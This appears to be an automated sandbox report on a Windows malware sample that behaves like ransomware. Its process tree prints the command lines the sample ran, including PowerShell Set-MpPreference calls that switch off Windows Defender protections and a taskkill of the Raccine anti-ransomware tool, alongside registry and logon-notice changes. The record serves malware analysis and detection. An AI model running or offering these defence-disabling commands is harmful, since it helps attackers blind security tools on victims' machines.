2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
151s
max time network
70s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Size

358KB
MD5

625c0b381462e729abdcca12d424e50a
SHA1

9e20fd6588a16b852d5b1f5ed122706aebce58ac
SHA256

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32
SHA512

48b289d17752bacbe65f46eee9b016264120dff5858bb87609bdfe2a10a1a1c6d12c395dc1bfa6adc8fe24b2b5da48957beec7eb0f38eaa244566ab0ac27c58d

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2104	icacls.exe
3680	icacls.exe
4460	icacls.exe
4192	icacls.exe
4548	icacls.exe
136	icacls.exe
4364	icacls.exe
748	icacls.exe
4544	icacls.exe
3068	icacls.exe
1428	icacls.exe
4576	icacls.exe
4160	icacls.exe
3844	icacls.exe
4312	icacls.exe
4128	icacls.exe
3908	icacls.exe
4284	icacls.exe
5036	icacls.exe
4668	icacls.exe
4712	icacls.exe
460	icacls.exe
4292	icacls.exe
2340	icacls.exe
4272	icacls.exe
1804	icacls.exe
4532	icacls.exe
2832	icacls.exe
4212	icacls.exe
2856	icacls.exe
4320	icacls.exe
5004	icacls.exe
1240	icacls.exe
4948	icacls.exe
4896	icacls.exe
5040	icacls.exe
4180	icacls.exe
916	icacls.exe
5096	icacls.exe
4656	icacls.exe
988	icacls.exe
4592	icacls.exe
3780	icacls.exe
3492	icacls.exe
2216	icacls.exe
5068	icacls.exe
4872	icacls.exe
1976	icacls.exe
4328	icacls.exe
3632	icacls.exe
2676	icacls.exe
1336	icacls.exe
716	icacls.exe
4408	icacls.exe
4696	icacls.exe
4296	icacls.exe
4204	icacls.exe
1864	icacls.exe
4868	icacls.exe
4536	icacls.exe
4340	icacls.exe
4964	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Важно."	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Ничего не нарушайте в работе!\r\nНаши IT специалисты Вам помогут\r\nДля этого пишите на почту - [email protected]"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
4744	taskkill.exe
1164	taskkill.exe
4844	taskkill.exe
4216	taskkill.exe
4172	taskkill.exe
4396	taskkill.exe
1184	taskkill.exe
4224	taskkill.exe
3892	taskkill.exe
4420	taskkill.exe
4244	taskkill.exe
4756	taskkill.exe
5092	taskkill.exe
4884	taskkill.exe
3680	taskkill.exe
1976	taskkill.exe
4452	taskkill.exe
1344	taskkill.exe
4584	taskkill.exe
4860	taskkill.exe
4508	taskkill.exe
1496	taskkill.exe
4332	taskkill.exe
4684	taskkill.exe
4644	taskkill.exe
4716	taskkill.exe
2732	taskkill.exe
4588	taskkill.exe
4240	taskkill.exe
4484	taskkill.exe
4344	taskkill.exe
4212	taskkill.exe
1232	taskkill.exe
976	taskkill.exe
4204	taskkill.exe
4372	taskkill.exe
4144	taskkill.exe
4380	taskkill.exe
4540	taskkill.exe
2472	taskkill.exe
2732	taskkill.exe
5100	taskkill.exe
1704	taskkill.exe
4132	taskkill.exe
4308	taskkill.exe
2260	taskkill.exe
5032	taskkill.exe
4180	taskkill.exe
916	taskkill.exe
5108	taskkill.exe
3784	taskkill.exe
4476	taskkill.exe
4832	taskkill.exe
1324	taskkill.exe
1496	taskkill.exe
4800	taskkill.exe
3976	taskkill.exe
4564	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2340	reg.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4044	PING.EXE
5000	PING.EXE
1540	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeIncreaseQuotaPrivilege	3836	powershell.exe
Token: SeSecurityPrivilege	3836	powershell.exe
Token: SeTakeOwnershipPrivilege	3836	powershell.exe
Token: SeLoadDriverPrivilege	3836	powershell.exe
Token: SeSystemProfilePrivilege	3836	powershell.exe
Token: SeSystemtimePrivilege	3836	powershell.exe
Token: SeProfSingleProcessPrivilege	3836	powershell.exe
Token: SeIncBasePriorityPrivilege	3836	powershell.exe
Token: SeCreatePagefilePrivilege	3836	powershell.exe
Token: SeBackupPrivilege	3836	powershell.exe
Token: SeRestorePrivilege	3836	powershell.exe
Token: SeShutdownPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeSystemEnvironmentPrivilege	3836	powershell.exe
Token: SeRemoteShutdownPrivilege	3836	powershell.exe
Token: SeUndockPrivilege	3836	powershell.exe
Token: SeManageVolumePrivilege	3836	powershell.exe
Token: 33	3836	powershell.exe
Token: 34	3836	powershell.exe
Token: 35	3836	powershell.exe
Token: 36	3836	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	4180	taskkill.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3784	taskkill.exe
Token: SeSecurityPrivilege	3784	taskkill.exe
Token: SeTakeOwnershipPrivilege	3784	taskkill.exe
Token: SeLoadDriverPrivilege	3784	taskkill.exe
Token: SeSystemProfilePrivilege	3784	taskkill.exe
Token: SeSystemtimePrivilege	3784	taskkill.exe
Token: SeProfSingleProcessPrivilege	3784	taskkill.exe
Token: SeIncBasePriorityPrivilege	3784	taskkill.exe
Token: SeCreatePagefilePrivilege	3784	taskkill.exe
Token: SeBackupPrivilege	3784	taskkill.exe
Token: SeRestorePrivilege	3784	taskkill.exe
Token: SeShutdownPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeSystemEnvironmentPrivilege	3784	taskkill.exe
Token: SeRemoteShutdownPrivilege	3784	taskkill.exe
Token: SeUndockPrivilege	3784	taskkill.exe
Token: SeManageVolumePrivilege	3784	taskkill.exe
Token: 33	3784	taskkill.exe
Token: 34	3784	taskkill.exe
Token: 35	3784	taskkill.exe
Token: 36	3784	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeIncreaseQuotaPrivilege	2028	powershell.exe
Token: SeSecurityPrivilege	2028	powershell.exe
Token: SeTakeOwnershipPrivilege	2028	powershell.exe
Token: SeLoadDriverPrivilege	2028	powershell.exe
Token: SeSystemProfilePrivilege	2028	powershell.exe
Token: SeSystemtimePrivilege	2028	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 620 wrote to memory of 3836	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	78
PID 620 wrote to memory of 3836	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	78
PID 620 wrote to memory of 2028	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	81
PID 620 wrote to memory of 2028	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	81
PID 620 wrote to memory of 3784	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	83
PID 620 wrote to memory of 3784	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	83
PID 620 wrote to memory of 1736	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	85
PID 620 wrote to memory of 1736	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	85
PID 620 wrote to memory of 3984	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	88
PID 620 wrote to memory of 3984	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	88
PID 620 wrote to memory of 2104	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	89
PID 620 wrote to memory of 2104	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	89
PID 620 wrote to memory of 2248	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	91
PID 620 wrote to memory of 2248	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	91
PID 620 wrote to memory of 3812	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	93
PID 620 wrote to memory of 3812	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	93
PID 620 wrote to memory of 2272	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	95
PID 620 wrote to memory of 2272	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	95
PID 620 wrote to memory of 4180	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	97
PID 620 wrote to memory of 4180	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	97
PID 620 wrote to memory of 4328	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	99
PID 620 wrote to memory of 4328	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	99
PID 620 wrote to memory of 4476	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	101
PID 620 wrote to memory of 4476	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	101
PID 620 wrote to memory of 4600	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	103
PID 620 wrote to memory of 4600	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	103
PID 620 wrote to memory of 4716	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	105
PID 620 wrote to memory of 4716	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	105
PID 620 wrote to memory of 4132	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	178
PID 620 wrote to memory of 4132	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	178
PID 620 wrote to memory of 2340	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	110
PID 620 wrote to memory of 2340	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	110
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	132
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	132
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	134
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	134
PID 620 wrote to memory of 4764	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	114
PID 620 wrote to memory of 4764	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	114
PID 620 wrote to memory of 4992	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	117
PID 620 wrote to memory of 4992	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	117
PID 620 wrote to memory of 4928	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	119
PID 620 wrote to memory of 4928	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	119
PID 620 wrote to memory of 4484	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	251
PID 620 wrote to memory of 4484	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	251
PID 620 wrote to memory of 4848	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	175
PID 620 wrote to memory of 4848	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	175
PID 620 wrote to memory of 1232	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	145
PID 620 wrote to memory of 1232	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	145
PID 620 wrote to memory of 4336	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	128
PID 620 wrote to memory of 4336	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	128
PID 620 wrote to memory of 4740	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	157
PID 620 wrote to memory of 4740	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	157
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	132
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	132
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	134
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	134
PID 620 wrote to memory of 4344	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	136
PID 620 wrote to memory of 4344	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	136
PID 620 wrote to memory of 4216	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	138
PID 620 wrote to memory of 4216	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	138
PID 620 wrote to memory of 1704	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	140
PID 620 wrote to memory of 1704	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	140
PID 620 wrote to memory of 4508	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	142
PID 620 wrote to memory of 4508	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	142

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Важно."	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Ничего не нарушайте в работе!\r\nНаши IT специалисты Вам помогут\r\nДля этого пишите на почту - [email protected]"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe"
1⤵
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Windows\SYSTEM32\reg.exe
